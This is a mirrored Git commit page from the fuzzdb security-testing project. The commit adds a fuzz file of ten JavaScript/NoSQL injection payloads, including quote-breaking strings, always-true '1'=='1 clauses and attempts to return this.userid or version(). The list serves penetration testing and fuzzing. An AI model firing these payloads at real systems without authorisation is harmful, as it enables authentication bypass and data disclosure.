mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 19:13:09 +00:00
Create js_inject.fuzz.txt
This commit is contained in:
parent
e98b4902b9
commit
8690869ae3
1 changed files with 10 additions and 0 deletions
10
attack/html_js_fuzz/js_inject.fuzz.txt
Normal file
10
attack/html_js_fuzz/js_inject.fuzz.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
function(){ return this.userid}
|
||||
' function(){ return this.username} or '1'='1
|
||||
function(){return version()}
|
||||
function(){return version}
|
||||
t'; return this; var d='!
|
||||
" function(){ return this} or '1'='1
|
||||
t"; return this; var d='!
|
||||
' || this || '1'=='1
|
||||
' || this.version || '1'=='1
|
||||
' || '1'=='1
|
Loading…
Reference in a new issue